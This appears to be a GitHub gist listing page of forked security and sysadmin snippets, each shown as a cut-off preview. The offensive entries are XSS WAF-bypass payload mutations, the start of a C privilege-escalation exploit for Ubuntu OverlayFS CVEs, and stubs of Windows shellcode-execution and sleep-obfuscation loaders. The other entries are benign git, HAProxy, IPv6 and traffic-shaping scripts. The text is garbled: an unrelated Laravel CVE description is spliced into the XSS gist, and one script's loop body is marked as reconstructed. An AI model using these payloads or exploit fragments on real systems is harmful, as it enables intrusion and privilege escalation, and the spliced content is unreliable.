@petarbojic
petarbojic / mutation_a.txt
Created May 26, 2024 09:12 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
CVE-ID: CVE-2024-29291
Description:
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.
Additional Information:
None.
petarbojic / urlhostname_test.js
Created March 14, 2024 18:48 — forked from irsdl/urlhostname_test.js
To evaluate how `URL(url).hostname` in JS handles discarded characters and character conversions in domain names.
// by @irsdl
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`:
// 1- Characters that are ignored when present in the domain name.
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me`
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/
// I am sure this must have been looked at before but I cannot find a reference
for (let i = 0; i <= 0xFFFF; i++) {
  const unicodeChar = String.fromCharCode(i);
  const urlString = `http://sorous${unicodeChar}h.me/blog/`;
  // Loop body below is reconstructed from the comments above (the preview of the gist stops at the line before).
  try {
    const hostname = new URL(urlString).hostname;
    // If the inserted character vanished, the parser silently discarded it (case 1).
    if (hostname === 'soroush.me') console.log(`ignored: U+${i.toString(16).padStart(4, '0')}`);
  } catch (e) {
    // Not a valid URL for this code point; nothing to report.
  }
}
petarbojic / gitcheats.txt
Created March 12, 2024 17:33 — forked from chrismccoy/gitcheats.txt
git cheats
# clone all your repos with gh cli tool
gh repo list --json name -q '.[].name' | xargs -n1 gh repo clone
# List all files in a folder in a git repository by last commit date
git ls-tree --name-only HEAD | while read -r filename; do echo "$(git log -1 --format="%ci " -- "$filename") $filename"; done | sort -r
# zip up an archive of each commit
for i in $(git log --format=%H); do git archive "$i" --format=zip -o "$i.zip"; done
petarbojic / Disable_IPv6.sh
Created March 12, 2024 17:32 — forked from chenshaoju/Disable_IPv6.sh
Disable IPv6 for Android in init.d
#!/system/bin/sh
#
echo 0 > /proc/sys/net/ipv6/conf/default/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/default/disable_ipv6
echo 0 > /proc/sys/net/ipv6/conf/all/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6
echo 0 > /proc/sys/net/ipv6/conf/wlan0/accept_ra
echo 1 > /proc/sys/net/ipv6/conf/wlan0/disable_ipv6
sleep 3
echo 0 > /proc/sys/net/ipv6/conf/default/accept_ra
petarbojic / haproxy_ssl_request_passthrough_ver2.txt
Created March 12, 2024 17:31 — forked from hxyconan/haproxy_ssl_request_passthrough_ver2.txt
Haproxy configuration for SSL request passthrough to different backend based on SNI
# Haproxy configuration for SSL request passthrough to a different backend based on the SNI read during the TLS handshake
# The load balancer does not decrypt the traffic; it forwards it transparently to the backend server in the private subnet.
# With this configuration you can run multiple services, each with its own SSL certificate, on different EC2 instances in the backend, while exposing only one load balancer IP to the public internet. No SSL certificate needs to be installed at the load balancer level.
# Ref:
# How to support wildcard sni: https://stackoverflow.com/questions/24839318/haproxy-reverse-proxy-sni-wildcard
# https://www.haproxy.com/blog/enhanced-ssl-load-balancing-with-server-name-indication-sni-tls-extension/
# https://stuff-things.net/2016/11/30/haproxy-sni/
petarbojic / GameOver(lay).md
Created November 11, 2023 10:07 — forked from win3zz/GameOver(lay).md
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {
petarbojic / hfsc-shape.sh
Created October 19, 2023 09:31 — forked from bradoaks/hfsc-shape.sh
HFSC - linux traffic shaping's best kept secret
#!/bin/bash
# As the "bufferbloat" folks have recently re-discovered and/or more widely
# publicized, congestion avoidance algorithms (such as those found in TCP) do
# a great job of allowing network endpoints to negotiate transfer rates that
# maximize a link's bandwidth usage without unduly penalizing any particular
# stream. This allows bulk transfer streams to use the maximum available
# bandwidth without affecting the latency of non-bulk (e.g. interactive)
# streams.
petarbojic / shitcode.c
Created May 22, 2023 14:05 — forked from susMdT/shitcode.c
hahaha da shellcode go brrrr
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
petarbojic / shellcode_exec_workerfactory.c
Created May 18, 2023 17:17 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {